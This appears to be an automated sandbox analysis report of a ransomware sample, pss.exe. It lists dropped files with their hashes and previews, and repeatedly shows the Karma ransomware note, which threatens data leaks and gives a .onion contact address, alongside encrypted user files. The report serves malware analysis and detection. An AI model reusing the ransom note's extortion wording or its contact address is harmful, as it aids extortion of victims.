C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.acl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.705947471556413
Encrypted:false
SSDEEP:3:JxGftbYO3gzqBF27rpKX0fn:7GhBU7r/fn
MD5:32A927A5174DF3232BE15437D0237A21
SHA1:1A80B1D25C7B12C80B658203E86ECD437903B484
SHA-256:C0EB1AFFFB05ECF99AE6A52B3F0F4ABC8DEE230DA6B6AE60C39FF83142C33EA5
SHA-512:847A99E545AA1FD908CE5A888756CAA95AA3A6BE646AE7224DE3E131D42BD35736398E20E9AEDF85A487B58637BA716FAE92245C429E52D87470DD0B65A1F2A6
Malicious:false
Preview: ...L.J..@...2'.@}...s..>.......H.Om...D......z..M4..(^o......KARMA3:
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.716579689896742
Encrypted:false
SSDEEP:3:xmDw0xStpoJRk7SCn:I/CpUrC
MD5:72B214850DC595DDEB9DD240A10A4958
SHA1:942A01512C786C3A339F4A1E36DC5EAAA2690D0B
SHA-256:686FE8DE71BAC250809851F8E2B87145DFB880FEB7C2E79A16C8F2C37086064E
SHA-512:A93281C41C3758F5A5CCE72C39CBF73A8B7C60BBCB2FDD26195506D2E17DB01633317EEFFB64838BC38FF777FAE6477DB47C868BB4AD439872CF63AEF5EF93D0
Malicious:false
Preview: ..z......YY..%...~w...E|p................N......l....^...KARMA.
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.exc
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.721488359553034
Encrypted:false
SSDEEP:3:LJUNRhErD7FGPV14zJ//70n:9UbI1WX4lX70n
MD5:35A02926A5A93E473BB5762D8838B85B
SHA1:22769C39120F52297D091EFB8F7D8BA01A570B00
SHA-256:121381FAA470B21EE85CE710B5B1BD421D7C61BEA0C7DD2DEB239E830893CCF1
SHA-512:04B3747887C3AD90C85479821D8D418291B46113A4E0DF833BA68CCF1675946E7D3F08FD0B854D6786ACE7035B4C9DEC3F3143C4DE2464DA25D6999595708ABF
Malicious:false
Preview: .sl<...M.K...>L0.`5..N.. ..&.....0..oq0...HV,2.".=...;......KARMA.}
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.669906159582652
Encrypted:false
SSDEEP:3:9KUWaVIXOEl0od9OWj3mUF:9kaGzXOWjJF
MD5:047DB9AAF20A2D05E51B31680F9123A6
SHA1:AEAEB2A3CCFB1ED0FC3F7B3BDC59DDA0EED9CC8E
SHA-256:2DC2D8EE5D1D6CE9EFE069CCCAA8711CC8356DB14E14034CB18F9AD938B3C96C
SHA-512:21F0E286DEC012773A24D885CF952A8A31FC80A1D026B9C256DE95FD4B56C3479D8D7B035F3D329679F2F66B0A801DB5AF386E0C8BDE6A221B8BEA2781769BE2
Malicious:false
Preview: {A...e*.Z...=Js7..g.(H....>...h.sm*.Q....).+.......G....C...KARMA
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Templates\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):18007
Entropy (8bit):7.990131636127572
Encrypted:true
SSDEEP:384:8FBhkci1VuREP3oVfdQnBQ6bNWUSBU61tyDvPQ8w3kjkya4z:chkci1IRg3oTH6JSW6iDQmLa4z
MD5:31E5361B11127C3DDDBEAFC7034F5E54
SHA1:745632C46BF910D50C7C858CA68E96B7A4F27FCC
SHA-256:349360670ECAA86C5D6EF6342FA580EEFA0A366FC4C3B879D30DFA6330BD86C2
SHA-512:B745C75E75BEFBDA02AF5617E3968D98024CA3BE73C2F1DA98E7007647FCFD3210CCAA8E815BDEEE84A640B040FA1F2C2767FB9ECCA9C7803DC485C4E940A1A2
Malicious:true
Preview: .cz.N.,.l...X.nb.0...T.s...d...|8.a.I......@....xA.x.Rb/....KARMA.Ie......h.D..4......{.....).._)[.u.{.dH...2..3zJa...#.....:....C..D[C*.c..\}.......7...E...-yB.....).D.>...v....z.n.z...z.........)..g...\s.-......V.*.L4.N)u-.Vla.V.<.j.X...Mpi..p.G.l.....2..M.q$..Z..... 5WK.s@..e.O..7[.c.(..#&...........^..u.,.*..k.#.9..a.6..=....h...1.zd:..G...).*.;.F..=d`E.B5Q.....IQD.....i.a..P.E.E.A.r......G.t..s`g+.#..S$....oT.../x......~G..$.t...T.9..K....#.;...~#..' \.6..T.%.r.?....?}>a......2....).}d...q.*u...PJ...cC....jE..\.].....T.......*&....l.Esf.T./..G.Lr..$..8.....A.x._..N.Q.Y}.X!.%.v.*7.YA'.m.w.dN...n.!...._C|a.+D...H>!..8H.K..N.Xv.ANx...../` 3..a.....&.f#.bv;;.%...B..u...rfXjN....lV.Jh.z..j...M.#.)Q...QJ.*.Z.F1.8[L..Q..g.PfE.&........I. ...r.,.wx.P.a....t.....#;....<...........lL..X...9v....V..x......8L...p..P.8...V.../.Q....W.iI_W..mC.#eS.3......F...{t.b.X..nMPx.T/..5ZC.hUu....G.....|.....U..8.w..dG..{j..r.+....L.-...=.c.|bS..b..b.W...
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):89
Entropy (8bit):5.918321740242394
Encrypted:false
SSDEEP:3:+q1RGG6OOpsTWuP+0qgeFH+EjWCT1TZn:+WgtOO2TA02FTqOn
MD5:68132C15654BA5EF2B549D059197905A
SHA1:6068A786D8EE6092A3DC4753CC75B472395B8A0A
SHA-256:9A4CF16C5831D71583AB001304DCAE8D00B7C3D72DD53B55AFADBB5268864ACA
SHA-512:0404F84536F9E7C0138426FAEB9D797D1B1031F9CCAA1FA096CAC3E9A57B1C26941786CDE12370A774B757CE36D3DFE19D90E49DE3AB3FFA8BF8A27D2B4727F8
Malicious:false
Preview: ..XD.M.\..>P..}...#_.:#.K..'1......1...+....{.....i...SJ......KARMAm'6...F..,)..P...q.
C:\Users\user\AppData\Roaming\Microsoft\UProof\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Vault\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Word\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Contacts\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828524406961908
Encrypted:false
SSDEEP:24:daSZxA3anfv40RULHTpiwec06UmGdKaayO5/106xsqmqrG2OQ:daSZNfvEHTARc06iKaayuG6ujt2OQ
MD5:DF49D05C4F5896C23935E857901144C6
SHA1:873592CC55E5D3BF80D1F6A88118BDEF2FC2A1D5
SHA-256:DC071EB24D1EA3DCB891DE552AF16EB9171CC47619F61A0FD85D489504B25060
SHA-512:8B7B49A74568E9AB1D5C83E1B4774879F22EA31A4DDFC20F7D7B4C358094AA7DBCA2FB0EE8A9CA430FA41A2A85490ED33B302413885EE2E985D1F519E7306FE2
Malicious:false
Preview: ....}..GLn.>..."{U.......l."...]?....G_j.)h....4....Eu........KARMA.......uW...G...o.]..j..Q.p-1........*.Y.'G.D+,a.]...2.B...c..nD...&\.}z...p.}....U.z.:.*.)%...@..v"2#l.0..}..Sc.i...i.0. ...4.~ ...'[wQ....g..z/...]..c..h`A(e...Gb..B..#F..Z...4..MD..Pn.....,.........{.... ..R6+.f!...?.vG.[;.P..Q..{..F.....h.B.U........S......C.,..].........v....?M..Q...O.\.b"m.9.Zuo....2%3!..d..k.....g\.2A..+Y.l....~...E.<.Dj...._.=..O..m0D..X.....L...|y+....]...........sph...".rB....R.1,..H.5'.....|D...N...{n...Q....z..+) ...WC..m.:3......S.u<k..._..w.5"$p..:.c..D..!.... .>.?....i.......!....5..4..W....8,.U,G..*.k*.......N..?.q.."...0..I....!S......./o./.`.JU.g-.\L.......W...^R[...^....g.8O..._....5W...(m......<.GK.E7nt$....~.L.E.89I..Le.....C..\.-.|.$..W....Qfb@..8.s..G....7.Z.<.....`..2-.#.V.rM@.h>E.....pf|...{.r..\..<.yP...7.l.......[.k...+.&....."...1e...r...t~.m.......^.*`d~..X[.82....O...\'..Zy..k.K......T..7...F[Q....".S<..97z.........&?.....E..U.F.,...iN...
C:\Users\user\Desktop\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.777045896477449
Encrypted:false
SSDEEP:24:2A7Y3u0jKZaXqdbQt4OTxJ+N4ThndhUu207KxZwjob3:tYvjKZa6BKj+NYrUJ07KF3
MD5:9D14749E0744BDD2900649AFEB8515C7
SHA1:3A31461658BF8D101129DB9E3E52CD171473E0BC
SHA-256:210452686AF3D20653C10952E2D8A49CED49137D754B5D9DF0D777DD92574C8F
SHA-512:316E6DF01F6DC9BD10B4C3ACAA9F80554A325007B893292A0D89F4181E1213BE9589CDD99E03DDC8DA74C41D39939BE164AE0DE4B540A17EDFCEDE901E921D78
Malicious:false
Preview: .(8...?$.*<....[...E....}F.$....bYS.......M.mYG.'?}.,..c.U.a...KARMAc B-u3.x......a..........n..Z/....D.-.}jq..1{'...u..U.`m]1.T......"...ow....<..>.)n.8..D.T.r....._.O...f.9.A-rPi...fI:.........7.Sa..M..DN...G].j......$.q..7o.i.b~.M.lD1v8.4V..Q!...<..13.ra.D..#.O!.\ .QTr+i...!.4A.(|....Q.8#r.B,......1......C.....GG...r......1......~.jG2..L.....f.8...F2....d.H......V.E+...&.`..G...tS.~>>.]..1(mhF.G.HG..w...v...-o...K...v.,..Bm$.g..3.8..9..UC.B.I.X7*p.<.....j9......b..f..|cv<.4x^..?.....r....u...:.......ue..cq..t1.T|.....n...O.o>VR...B...kYz..L@..T.._2..8,........(D..EY..6.t..$!1{..!.]~&Iv...8....[.Wkhr>TE..+........FE..?..'..l......8~....Y..@...2.S...|Y.).'K.-...0.*...D.....`oQ.W.:.l..'..a..|O..]1.E.@<#X[...E.{..9.....=....1...W.5.V..I....2..M.=IpE....aF.H..;..w.....C.&...,.z..}!..y.......h.:Em.....gka.:A....2E........SI.....frw.X.....1O]..W..&.]{w...K..8'*+...~.k...:''.bk....n,..X.1w..."....1,......f+.....X...cI..d.U.~ }.a.z.....evS.2bn..
C:\Users\user\Desktop\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.792133753040234
Encrypted:false
SSDEEP:24:TUwxDgWdiPHdjNOyaQlXq7YOBsU8wOiHoMxlsqCMBzrWKIT:Awqy8OYXk8RFMxR5WKIT
MD5:B97349C71E967336930D9C60296EAE81
SHA1:8B6D5D425295C3172AAACE42FD162EBE3E3BB199
SHA-256:E64BE070F3EBF1262347D720B385F29F59332D6436DF022861CADA90D8A70C88
SHA-512:A99918694F6F6D8994C0922317C111383ACF49E3492D478DC65FDCDB6AAE61416806B4718AAC830C745359C37A62067E924706A150A9CFD24115B351E9FCB02C
Malicious:false
